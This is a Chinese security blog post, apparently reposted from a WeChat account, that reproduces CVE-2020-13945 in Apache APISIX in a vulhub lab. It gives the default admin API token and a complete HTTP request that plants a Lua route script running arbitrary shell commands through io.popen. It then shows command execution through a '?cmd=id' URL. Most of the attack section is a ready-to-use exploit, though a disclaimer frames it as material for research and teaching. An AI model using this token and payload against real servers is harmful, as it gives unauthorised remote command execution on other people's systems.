前言:
Apache APISIX是一个高性能API网关。在用户未指定管理员Token或使用了默认配置文件的情况下,ApacheAPISIX将使用默认的管理员Token edd1c9f034335f136f87ad84b625c8f1,攻击者利用这个Token可以访问到管理员接口,进而通过script参数来插入任意LUA脚本并执行。
搭建方式:
使用vulhub进行搭建,目录:
bachang/vulhub/apisix/CVE-2020-13945
启动:
docker-compose up -d
访问
IP:9080
以下页面即启动成功
漏洞复现:
我们利用默认的token去传递一个恶意LUA脚本
POST /apisix/admin/routes HTTP/1.1Host: your-ip:9080Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Connection: closeX-API-KEY: edd1c9f034335f136f87ad84b625c8f1Content-Type: application/jsonContent-Length: 406{"uri": "/attack","script": "local _M = {} n function _M.access(conf, ctx) n local os = require('os')n local args = assert(ngx.req.get_uri_args()) n local f = assert(io.popen(args.cmd, 'r'))n local s = assert(f:read('*a'))n ngx.say(s)n f:close() n end nreturn _M","upstream": {"type": "roundrobin","nodes": {"example.com:80": 1}}}
使用burp进行发送包
发送之后我们可以访问我们通过上面代码生成的attack页面,直接进行命令执行
访问http://192.168.195.140:9080/attack?cmd=id
到这一步就可以任意命令执行了。
原文始发于微信公众号(白安全组):Apache APISIX 默认密钥漏洞(CVE-2020-13945)
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论